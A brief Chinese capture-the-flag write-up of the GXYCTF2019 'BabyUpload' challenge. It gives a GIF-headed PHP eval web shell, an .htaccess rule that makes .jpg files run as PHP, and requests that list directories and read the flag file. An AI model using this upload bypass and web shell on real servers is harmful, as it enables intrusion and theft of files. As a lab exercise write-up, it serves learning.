[GXYCTF2019]BabyUpload

先随便传个png上去试试

经过一番尝试发现接受jpeg类型

改为html风格发现上传成功

GIF98a
<script language='php'>eval($_GET['cmd']);</script>

尝试上传.htaccess，将对jpg文件的访问方式修改

AddType application/x-httpd-php .jpg

访问

/upload/xxx/tmp.jpg?cmd=phpinfo();

成功上传 由于system被ban，通过scandir来查看目录

/?cmd=var_dump(scandir('/'));

最后用file_get_contents读取

/?cmd=var_dump(file_get_contents('/flag'));

学到的知识用上了，开心QwQ

#Web #文件上传 #RCE #PHP #bypass